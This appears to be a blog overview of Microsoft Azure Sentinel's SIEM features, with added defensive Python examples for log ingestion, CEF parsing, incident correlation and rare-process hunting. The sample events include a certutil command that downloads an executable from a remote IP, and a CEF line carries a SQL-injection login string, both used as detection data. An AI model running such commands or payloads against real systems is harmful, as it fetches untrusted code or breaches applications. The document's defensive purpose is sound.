Azure Sentinel: A Powerful Security System
Microsoft Azure Sentinel is a flexible, cloud-native Security Information and Event Management (SIEM) and Security Orchestration, Automation and Response (SOAR) solution that provides a single place for threat visibility, proactive hunting, and threat response. It uses analytics and Artificial Intelligence to recognize security threats and to drive the response to them. Azure Sentinel is offered as an affordable service with no hidden costs.
Microsoft Azure Sentinel
Microsoft Azure Sentinel combines the power of the cloud and Artificial Intelligence to help identify security threats and stop them before they cause harm. Integrated with Microsoft 365 solutions, it lets you:
- Collect data at cloud scale across all users, devices, applications, and infrastructure both on-premises and in multiple clouds.
- Detect previously undetected threats, and minimize false positives using Microsoft’s analytics and unparalleled threat intelligence.
- Investigate threats with artificial intelligence, and hunt for suspicious activities at scale, tapping into years of cybersecurity work at Microsoft.
- Respond to incidents rapidly with built-in orchestration and automation of common tasks.
Azure Sentinel also lets you bring your own threat intelligence, which it combines with its own analytics and Artificial Intelligence to improve threat detection and protection.
Data Connection Methods
Microsoft Azure Sentinel connects to your security services through three kinds of data connection methods: service-to-service integration (Amazon Web Services, Azure Security Center, Windows Firewall, etc.), external solutions via API, and external solutions via an agent. Once a source is connected you can customize threat detection and alert rules over its data, whatever kind of security data it carries.
Service-to-service integration: Some services, such as AWS and Microsoft services, connect natively, which gives the tightest integration. Other solutions connected this way include Azure Activity, Azure Security Center, Cloud App Security, Windows Firewall, Microsoft 365, and many more.
External solutions via API: Some data sources are connected through their Application Programming Interfaces (APIs). Event logs are retrieved from the source through the API, filtered to the data types you want, and then sent to Azure Log Analytics.
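As an added example (not code from the original post or from Microsoft), here is how data pulled from such a source is pushed into Log Analytics through the HTTP Data Collector API, which signs every POST with an HMAC-SHA256 over the request metadata using the workspace's shared key. The workspace ID, shared key, table name and sample records below are constructed placeholders; only the `send` function needs network access and real credentials, everything else runs offline.

```python
import base64
import hashlib
import hmac
import json
import urllib.request
from datetime import datetime, timezone

# Constructed placeholders, not real credentials: the workspace ID is a GUID and
# the primary/secondary shared key (base64) comes from the workspace's
# "Agents management" blade.
WORKSPACE_ID = "00000000-0000-0000-0000-000000000000"
SHARED_KEY = base64.b64encode(b"placeholder-key-not-a-real-secret").decode()

API_RESOURCE = "/api/logs"
API_VERSION = "2016-04-01"


def rfc1123_utc(when=None) -> str:
    """The x-ms-date header must be an RFC 1123 date in GMT."""
    when = when or datetime.now(timezone.utc)
    return when.strftime("%a, %d %b %Y %H:%M:%S GMT")


def string_to_sign(content_length: int, rfc1123_date: str,
                   method: str = "POST",
                   content_type: str = "application/json") -> str:
    """Canonical string the Data Collector API expects to be HMAC-signed."""
    return (f"{method}\n{content_length}\n{content_type}\n"
            f"x-ms-date:{rfc1123_date}\n{API_RESOURCE}")


def build_authorization(workspace_id: str, shared_key: str,
                        content_length: int, rfc1123_date: str) -> str:
    """Authorization header value: 'SharedKey <id>:<base64(HMAC-SHA256)>'.

    The shared key is shown base64-encoded in the portal; it is decoded to
    raw bytes before it is used as the HMAC key.
    """
    key = base64.b64decode(shared_key)
    message = string_to_sign(content_length, rfc1123_date).encode("utf-8")
    digest = hmac.new(key, message, hashlib.sha256).digest()
    return f"SharedKey {workspace_id}:{base64.b64encode(digest).decode()}"


def build_request(workspace_id: str, shared_key: str, log_type: str,
                  records: list, rfc1123_date: str = None):
    """Assemble URL, headers and body for one POST of JSON records."""
    body = json.dumps(records).encode("utf-8")
    rfc1123_date = rfc1123_date or rfc1123_utc()
    headers = {
        "Content-Type": "application/json",
        "Authorization": build_authorization(workspace_id, shared_key,
                                             len(body), rfc1123_date),
        # Records land in a custom table named <log_type>_CL.
        "Log-Type": log_type,
        "x-ms-date": rfc1123_date,
    }
    url = (f"https://{workspace_id}.ods.opinsights.azure.com"
           f"{API_RESOURCE}?api-version={API_VERSION}")
    return url, headers, body


def send(workspace_id: str, shared_key: str, log_type: str, records: list) -> int:
    """POST the records; returns the HTTP status (200 on success). Needs network."""
    url, headers, body = build_request(workspace_id, shared_key, log_type, records)
    req = urllib.request.Request(url, data=body, headers=headers, method="POST")
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.status


# Constructed sample: two denied connections from a fictional appliance "fw01".
SAMPLE_RECORDS = [
    {"SourceIP": "10.1.2.3", "DestinationIP": "203.0.113.7",
     "DestinationPort": 445, "Action": "deny", "Device": "fw01"},
    {"SourceIP": "10.1.2.9", "DestinationIP": "203.0.113.7",
     "DestinationPort": 3389, "Action": "deny", "Device": "fw01"},
]

if __name__ == "__main__":
    url, headers, body = build_request(WORKSPACE_ID, SHARED_KEY,
                                       "FirewallDeny", SAMPLE_RECORDS)
    print(url)
    print(headers["Authorization"])
```

Because the signature covers the content length and the `x-ms-date` value, a captured request cannot be replayed with a different body, and the workspace rejects requests whose date is too far from its own clock; keep the collector host's clock synchronized.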
External solutions via agent: The Azure Sentinel agent, based on the Log Analytics agent, converts CEF-formatted logs into a simpler format that Log Analytics can consume. Depending on the appliance type, the agent is installed either directly on the appliance or on a Linux server that receives the appliance's syslog stream.
The agent can be deployed automatically or manually on a dedicated machine (an Azure VM or an on-premises host) that relays between the appliance and Azure Sentinel. Automatic deployment is only available when the machine is a new Azure VM; otherwise deploy the agent manually on an existing Azure VM, a VM in another cloud, or an on-premises machine.
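The conversion the agent performs is essentially CEF parsing into columns. As an added example, not the agent's own code, the following Python parser takes syslog lines carrying CEF records and produces flat dicts named after the columns of Sentinel's CommonSecurityLog table. The extension-key mapping is an assumed subset of the real one, and the two sample lines are constructed.

```python
import re
from typing import Any, Dict, List

# CEF header fields in spec order, named as the Sentinel CommonSecurityLog
# table names them.
HEADER_FIELDS = ("DeviceVendor", "DeviceProduct", "DeviceVersion",
                 "DeviceEventClassID", "Activity", "LogSeverity")

# Assumed subset of the extension-key -> CommonSecurityLog column mapping;
# anything not listed ends up in AdditionalExtensions.
EXTENSION_MAP = {
    "src": "SourceIP", "dst": "DestinationIP",
    "spt": "SourcePort", "dpt": "DestinationPort",
    "proto": "Protocol", "act": "DeviceAction",
    "suser": "SourceUserName", "dhost": "DestinationHostName",
    "rt": "ReceiptTime",
}
INT_COLUMNS = {"SourcePort", "DestinationPort"}

# A header separator is a pipe not preceded by a backslash (CEF writes a
# literal pipe in the header as "\|"; the rarer "\\|" case is not handled).
# Extension pairs are split on a space followed by "key=", because values
# may contain spaces while a literal "=" in a value is escaped as "\=".
_HEADER_SPLIT = re.compile(r"(?<!\\)\|")
_EXT_SPLIT = re.compile(r" (?=[A-Za-z0-9_.]+=)")
_UNESCAPE = re.compile(r"\\([\\|=])")


def _unescape(text: str) -> str:
    return _UNESCAPE.sub(r"\1", text)


def parse_cef(line: str) -> Dict[str, Any]:
    """Parse one syslog line carrying a CEF record into a flat dict."""
    start = line.find("CEF:")
    if start < 0:
        raise ValueError("no CEF record in line")
    parts = _HEADER_SPLIT.split(line[start:], maxsplit=7)
    if len(parts) < 7:
        raise ValueError("truncated CEF header")
    record: Dict[str, Any] = {"CefVersion": parts[0][len("CEF:"):]}
    for name, raw in zip(HEADER_FIELDS, parts[1:7]):
        record[name] = _unescape(raw)
    extra: Dict[str, str] = {}
    extension = parts[7].strip() if len(parts) > 7 else ""
    for pair in _EXT_SPLIT.split(extension):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        value = _unescape(value)
        column = EXTENSION_MAP.get(key)
        if column is None:
            extra[key] = value
        elif column in INT_COLUMNS and value.isdigit():
            record[column] = int(value)
        else:
            record[column] = value
    record["AdditionalExtensions"] = extra
    return record


def parse_all(lines: List[str]) -> List[Dict[str, Any]]:
    """Parse a batch, skipping lines that are not CEF instead of failing."""
    out = []
    for line in lines:
        try:
            out.append(parse_cef(line))
        except ValueError:
            continue
    return out


# Constructed sample lines: one with a syslog prefix, one with escaped
# characters in the header and in an extension value.
SAMPLE_LINES = [
    "<134>Jan 12 10:15:01 fw01 CEF:0|Palo Alto Networks|PAN-OS|9.1|TRAFFIC|deny|5|"
    "rt=Jan 12 2024 10:15:01 src=10.1.2.3 spt=51515 dst=203.0.113.7 dpt=445 "
    "proto=TCP act=deny suser=corp\\jdoe msg=blocked outbound SMB",
    "CEF:0|Vendor\\|Inc|Web App Firewall|1.0|100|SQLi attempt|9|"
    "src=198.51.100.9 dst=10.0.0.5 dpt=443 request=/login?user\\=admin' OR 1\\=1",
]

if __name__ == "__main__":
    for rec in parse_all(SAMPLE_LINES):
        print(rec)
```

The escaping rules matter for security content: an appliance that fails to escape `=` or `|` in user-controlled fields (a URL, a username) lets an attacker shift column boundaries, so a collector should treat malformed records as suspicious rather than silently drop them.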
Microsoft collaborates with partners in the Microsoft Intelligent Security Association, including Palo Alto Networks, F5, Accenture, Symantec, and many more. For example, Andrew Winkelmann, Global Consulting Practice Lead at Accenture, said in an interview that “With Microsoft Azure Sentinel, we can better address the main SIEM landscape challenges for our clients, along with simplifying data residency and GDPR concerns.”
Hence, with Microsoft Azure Sentinel, bringing in the tools you already run does not require breaking a sweat.
Workbooks
After connecting data to Azure Sentinel you can monitor it using Azure Monitor workbooks. Workbooks help in situations like:
- Exploring how Azure Sentinel is being used.
- Explaining to your team how a newly released feature works.
- Sharing the results of your experiments with other team members.
- Reporting the impact of an outage on overall functioning.
Saving & Sharing Workbooks with your team
Workbooks can be saved either in the My Reports section or in the Shared Reports section, depending on your requirements, and can be shared by link or email. Recipients need access to the workspace resource to view a workbook, and Contributor permission on it to edit the workbook.
Analytics & Incidents
Azure Sentinel uses analytics to correlate alerts into incidents: groups of related alerts that together represent an actionable potential threat to be investigated and resolved. Grouping reduces the noise and the number of alerts you have to review and investigate.
You can use the built-in rules in Azure Sentinel to choose which Microsoft security solutions create incidents in real time.
Using Microsoft Security incident creation analytics rules
Azure Sentinel incidents can be created automatically from the alerts of Microsoft security solutions by using the built-in rules available in Azure Sentinel. You can also edit these rules to define more specific conditions for creating incidents.
For example, you can choose to create Azure Sentinel incidents automatically only from high-severity Security Center alerts.
You can create more than one Microsoft Security analytics rule per service type; because each rule acts as a filter, this does not create duplicate incidents. You can also select, when you connect a Microsoft security solution, which of its alerts should automatically generate incidents in Azure Sentinel.
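To make the filtering and grouping concrete, here is an added example (a simplified model written for this page, not Sentinel's own logic) that applies per-provider minimum-severity incident-creation rules and then groups the surviving alerts into one incident whenever they share an entity, transitively. The rule table, provider names and alerts are constructed; Sentinel's real grouping options are richer than this.

```python
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple

SEVERITY_RANK = {"Informational": 0, "Low": 1, "Medium": 2, "High": 3}


@dataclass(frozen=True)
class Alert:
    id: str
    provider: str              # e.g. "Azure Security Center"
    severity: str
    entities: Tuple[str, ...]  # "type:value", e.g. "ip:203.0.113.7"


@dataclass
class Incident:
    alert_ids: List[str]
    entities: Set[str]
    severity: str              # highest severity among the member alerts


# Constructed incident-creation rules: one per Microsoft security provider,
# giving the minimum severity an alert needs to create (or join) an incident.
# Providers without a rule never create incidents, mirroring "create incidents
# only from high-severity Security Center alerts".
RULES = {
    "Azure Security Center": "High",
    "Azure AD Identity Protection": "Medium",
}


def passes_rule(alert: Alert, rules: Dict[str, str]) -> bool:
    minimum = rules.get(alert.provider)
    return (minimum is not None
            and SEVERITY_RANK[alert.severity] >= SEVERITY_RANK[minimum])


def correlate(alerts: List[Alert], rules: Dict[str, str]) -> List[Incident]:
    """Group rule-passing alerts that share at least one entity (transitively)."""
    parent: Dict[str, str] = {}          # union-find over entity nodes

    def find(x: str) -> str:
        while parent[x] != x:
            parent[x] = parent[parent[x]]  # path halving
            x = parent[x]
        return x

    def union(a: str, b: str) -> None:
        parent[find(a)] = find(b)

    kept = [a for a in alerts if passes_rule(a, rules)]
    for alert in kept:
        # Every alert gets its own node ("alert:<id>") so an alert with no
        # entities still becomes a stand-alone incident.
        nodes = ("alert:" + alert.id,) + alert.entities
        for node in nodes:
            parent.setdefault(node, node)
        for node in nodes[1:]:
            union(nodes[0], node)

    groups: Dict[str, List[Alert]] = {}
    for alert in kept:
        groups.setdefault(find("alert:" + alert.id), []).append(alert)

    return [
        Incident(
            alert_ids=[a.id for a in members],
            entities={e for a in members for e in a.entities},
            severity=max((a.severity for a in members), key=SEVERITY_RANK.get),
        )
        for members in groups.values()
    ]


# Constructed alerts. A1 and A2 share an IP, so they join one incident; A3 is
# below the Security Center threshold; A5 comes from a provider with no rule,
# so it neither creates an incident nor links A1 to anything else.
SAMPLE_ALERTS = [
    Alert("A1", "Azure Security Center", "High", ("host:web01", "ip:203.0.113.7")),
    Alert("A2", "Azure AD Identity Protection", "Medium", ("account:jdoe", "ip:203.0.113.7")),
    Alert("A3", "Azure Security Center", "Low", ("host:db01",)),
    Alert("A4", "Azure Security Center", "High", ("host:db01", "account:svc-backup")),
    Alert("A5", "Some Other Provider", "High", ("host:web01",)),
]

if __name__ == "__main__":
    for inc in correlate(SAMPLE_ALERTS, RULES):
        print(inc.severity, inc.alert_ids, sorted(inc.entities))
```

Note that filtering happens before grouping: an alert dropped by its rule cannot act as a bridge between two otherwise unrelated incidents, which is exactly why tightening a creation rule can change how many incidents you see, not just how many alerts.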
Playbooks
Security automation & orchestration
Playbooks integrate with Azure services and with your existing tools to automate common tasks and simplify security orchestration. Azure Sentinel's automation and orchestration is built on a highly extensible architecture that scales your automation as new threats emerge. You build playbooks with Azure Logic Apps, or choose from a growing gallery of built-in playbooks. Logic Apps connectors let you apply custom logic in code and work with ServiceNow, Jira, Zendesk, HTTP requests, Microsoft Teams, Slack, Windows Defender ATP, and Cloud App Security.
For example, if you use the ServiceNow ticketing system, you can use Azure Logic Apps to automate your workflow and open a ServiceNow ticket each time a particular event is detected.
Investigation & Hunting
Azure Sentinel's investigation tools help you analyze a potential threat and find its root cause. Its hunting tools, built around the MITRE ATT&CK framework, let you hunt for threats before any alert is triggered. For example, one built-in query may surface many uncommon processes running on your infrastructure; you would not want an alert every time one of them runs, but you do want to look at them.
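An added example of that kind of hunt, written for this page rather than taken from Sentinel's built-in queries: it computes, per process, how many hosts it ran on and how often, and lists the processes seen on at most one host together with a few sample command lines to review. The events are constructed in the shape of SecurityEvent 4688 rows, and the KQL in the comment is the approximate equivalent you would run in the hunting page.

```python
from typing import Any, Dict, List

# Constructed process-creation events shaped like SecurityEvent (EventID 4688)
# rows; hosts, accounts and command lines are invented.
EVENTS = [
    {"Computer": "ws01", "Account": "CORP\\alice",
     "NewProcessName": r"C:\Windows\System32\svchost.exe", "CommandLine": "svchost.exe -k netsvcs"},
    {"Computer": "ws02", "Account": "CORP\\bob",
     "NewProcessName": r"C:\Windows\System32\svchost.exe", "CommandLine": "svchost.exe -k netsvcs"},
    {"Computer": "srv01", "Account": "NT AUTHORITY\\SYSTEM",
     "NewProcessName": r"C:\Windows\System32\svchost.exe", "CommandLine": "svchost.exe -k netsvcs"},
    {"Computer": "ws01", "Account": "CORP\\alice",
     "NewProcessName": r"C:\Windows\explorer.exe", "CommandLine": "explorer.exe"},
    {"Computer": "ws02", "Account": "CORP\\bob",
     "NewProcessName": r"C:\Windows\explorer.exe", "CommandLine": "explorer.exe"},
    {"Computer": "ws02", "Account": "CORP\\bob",
     "NewProcessName": r"C:\Users\bob\AppData\Local\Temp\update.exe",
     "CommandLine": "update.exe -s http://203.0.113.5/x"},
    {"Computer": "ws02", "Account": "CORP\\bob",
     "NewProcessName": r"C:\Users\bob\AppData\Local\Temp\update.exe",
     "CommandLine": "update.exe -s http://203.0.113.5/x"},
    {"Computer": "srv01", "Account": "CORP\\svc-backup",
     "NewProcessName": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -urlcache -split -f http://203.0.113.5/p.exe p.exe"},
]

# Roughly the KQL shape of the same hunt against the SecurityEvent table
# (illustrative, not one of Sentinel's shipped queries):
#   SecurityEvent
#   | where EventID == 4688
#   | summarize Hosts = dcount(Computer), Executions = count() by NewProcessName
#   | where Hosts <= 1


def process_prevalence(events: List[Dict[str, Any]]) -> Dict[str, Dict[str, Any]]:
    """Per process image: distinct hosts, execution count, a few sample rows."""
    stats: Dict[str, Dict[str, Any]] = {}
    for ev in events:
        s = stats.setdefault(ev["NewProcessName"],
                             {"hosts": set(), "executions": 0, "samples": []})
        s["hosts"].add(ev["Computer"])
        s["executions"] += 1
        if len(s["samples"]) < 3:   # keep a handful of context rows for triage
            s["samples"].append((ev["Computer"], ev["Account"], ev["CommandLine"]))
    return stats


def rare_processes(events: List[Dict[str, Any]], max_hosts: int = 1) -> List[Dict[str, Any]]:
    """Processes seen on at most max_hosts distinct machines, rarest first."""
    fleet = {ev["Computer"] for ev in events}
    rows = []
    for name, s in process_prevalence(events).items():
        if len(s["hosts"]) <= max_hosts:
            rows.append({"Process": name, "Hosts": len(s["hosts"]),
                         "FleetSize": len(fleet), "Executions": s["executions"],
                         "Samples": s["samples"]})
    rows.sort(key=lambda r: (r["Hosts"], r["Executions"], r["Process"]))
    return rows


if __name__ == "__main__":
    for row in rare_processes(EVENTS):
        print(f'{row["Process"]}  hosts={row["Hosts"]}/{row["FleetSize"]} '
              f'runs={row["Executions"]}')
        for computer, account, cmd in row["Samples"]:
            print(f"    {computer} {account}: {cmd}")
```

Prevalence is a hunting signal, not an alert condition: a process on one host out of three is worth a look (here a download via certutil and an executable launched from a Temp folder), while the same query across a large fleet would need a higher `max_hosts` or an allow-list to stay reviewable, which is exactly why this belongs in a hunting query or bookmark rather than an analytics rule.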
Use the investigation graph to deep dive
The investigation graph offers you:
- Visual context from raw data: it displays the entity relationships extracted automatically from the raw data, so you can easily view connections across different data sources.
- Full investigation scope discovery: it expands the scope of your investigation by using built-in exploration queries to surface the full scope of the breach.
- Built-in investigation steps: it uses predefined exploration options to make sure you are asking the right questions in the face of a threat.
Hunting
Azure Sentinel hunting offers the following advantages:
- Built-in queries: the hunting page provides preloaded example queries designed to get you started and familiar with the tables and the query language.
- Powerful query language with IntelliSense: the query language (KQL) gives you the flexibility needed to take hunting to the next level.
- Create your own bookmarks: use the bookmark function to mark any matches or findings that seem unusual or suspicious, so you can come back to them later.
- Use notebooks to automate investigation: Jupyter notebooks are like playbooks that walk through the steps of an investigation and hunt. A notebook combines all the hunting steps into a reusable procedure that can be shared with others in your organization.
- Query the stored data: you can query the data in the tables, for example process creation, DNS events, and many other event types.
- Links to the community: you can also borrow the power of the greater community to find additional queries and data sources.
The Azure Sentinel community is a valuable resource for threat detection and automation content. Microsoft security analysts constantly add new workbooks, hunting queries, and more, and the sample content can be downloaded from Microsoft's public Azure Sentinel GitHub repository to use as the basis for your own custom workbooks, hunting queries, notebooks, and other Azure Sentinel content.